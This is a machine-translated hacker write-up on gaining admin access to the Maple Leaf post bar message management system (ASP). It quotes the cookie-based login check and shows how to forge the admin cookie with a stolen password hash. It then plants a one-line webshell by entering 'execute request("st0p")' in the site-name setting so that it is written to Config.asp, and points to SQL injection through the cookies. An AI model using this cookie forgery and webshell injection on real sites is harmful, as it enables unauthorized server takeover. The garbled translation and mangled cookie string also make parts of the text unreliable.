Privilege escalation in the maple leaf bar Management System

Author: st0p
Reprinted please indicate http://www.st0p.org

After just finishing his work, I saw the Link in the BK instant (black instant) Group send a 40-bit HASH to ask what the encryption algorithm is. It looks like MD5. He said there is a source code, it's the maple leaf post bar message management system. Then I went to the next page and checked it out. The goal is the maple leaf post bar Message Management System 2.2, which is officially 2. 3. the following Elevation of Privilege document also applies. Other versions are unknown because st0p has not been tried.

First, let's take a look at the algorithm whose MD5 is the variant.

The normal 16-bit is
MD5 = LCase (WordToHex (B) & WordToHex (c ))
The normal 32-bit is
MD5 = LCase (WordToHex (a) & WordToHex (B) & WordToHex (c) & WordToHex (d ))
But here is the maple leaf post.
MD5 = LCase (WordToHex (B) & WordToHex (c) & WordToHex (d ))
 

Seeing the above Code, we understand that we only need to take the first 16 digits to get a standard MD5 HASH.
However, although the HASH sent by Link is converted to the standard MD5, it still cannot be cracked. Do we use the rainbow table to run it? Not realistic...
The administrator login verification is verified by Call admin_user (). The custom process is in admin/websub. Asp.

<%
Sub admin_user ()
Server_v1 = Cstr (Request. ServerVariables ("HTTP_REFERER "))
Server_v2 = Cstr (Request. ServerVariables ("SERVER_NAME "))
If mid (server_v1, 8, len (server_v2) <> server_v2 Then
Response. Write ("the submitted path is incorrect. Do not submit data from outside the site! ")
Response. End ()
End If
Lailu Verification
If Request. Cookies ("fy_admin") ("admin_name") = "" Or Request. Cookies ("fy_admin") ("admin_pwd") = "" then
Check whether the COOKIE is null. If it is null, an error is displayed.
%>
<Script language = "javascript">
Alert ("incorrect user name and password entered or logon timeout! ")
Top. window. location. href = "index. Asp"
</Script>
<%
Response. End ()
Else
Admin_name = ReplaceBadWord (Request. Cookies ("fy_admin") ("admin_name "))
Admin_pwd = ReplaceBadWord (Request. Cookies ("fy_admin") ("admin_pwd "))
SQL = "Select [id] From [FY_user] where [user_name] =" & admin_name & "And [user_pwd] =" & admin_pwd & "And [admin_user] = True"
Here, we get the user name and password in the COOKIE, and then go to the database for query. Then Link has an account and password encryption string (you can view the mixed string, which is not within the scope described in this article)
Set Rs = Server. CreateObject ("adodb. recordset ")
Rs. open SQL, Conn, 1, 1
If Rs. Eof Then
%>
<Script language = "javascript">
Alert ("incorrect user name and password entered or logon timeout! ")
Top. window. location. href = "index. Asp"
</Script>
<%
If the error does not exist, the system prompts an error and redirects.
Rs. Close
Set Rs = Nothing
Conn. Close
Set Conn = Nothing
Response. End ()
End If
End If
End Sub
%>
 

After reading the above Code, we understand that as long as we get the Administrator account and password encryption string, even if the password is not clear, we can log on to the background and test it locally. The specific usage method is shown in the figure.

Domain I opened directly,

Then we change the COOKIE
Adminlogin = OK; AJSTAT_ OK _times = 4; rtime = 2; ltime = 1250136556890; cnzz_eid = 11431232-1249953091-; cnzz_a1486952 = 128; token = % %%3a44823207% 3A40666310% %%%3a25600025% %%%%%%%%%%3a157930096% 3A131052116% %%%%%%%%%%%3a258997% %%3a28352637% 3A29995474% 3a7%1790% %%%3a-%391530% 3A30555659% %%%%%%%%%%%%%3a4646%13% %%%%%%%3a; sin1486952 = http % 3A // 127.0.0.1% 3A88/my_task_list.php % 3 Flie % 3D2; AJSTAT_ OK _pages = 32; ASPSESSIONIDCSBDQCDD = IINFBMMBGAMIAOPLJPPAMMHK; fy % 5 Fadmin = admin % 5 Fpwd = 469e80d32c0559f88b3772452c0559f88b377245 & admin % 5 Fname = admin

Where
Admin % 5Fname is the user name
Admin % 5Fpwd is the password HASH
After the change, go to the background

After obtaining the management permission, it is much easier to raise the permission. When writing the configuration file, the system writes the configuration into incsub/Config. in Asp, click basic website settings. for basic settings, enter ": execute request (" st0p ") &" in the website name ")&"

Then we can write a sentence successfully.
Http://target.com/incsub/Config.Asp
The password is st0p.
Then I don't need to talk about it anymore...
Hey, of course, someone will ask where the account and password HASH come from. There are many ways to do this. I think the Link website should not change the database path by default.
In fact, if there is no custom ReplaceBadWord function during background verification, we can directly construct a statement in the COOKIE to implement it, so that we do not need to get the username and HASH value, this method is only applicable when there is an administrator account and password HASH, but it is useful when MD5 cannot be cracked as plain text. It is also a pretty bad hole, but sometimes it is good to use it... It seems that this COOKIE has not been written on the Internet for verification. I didn't see it anyway...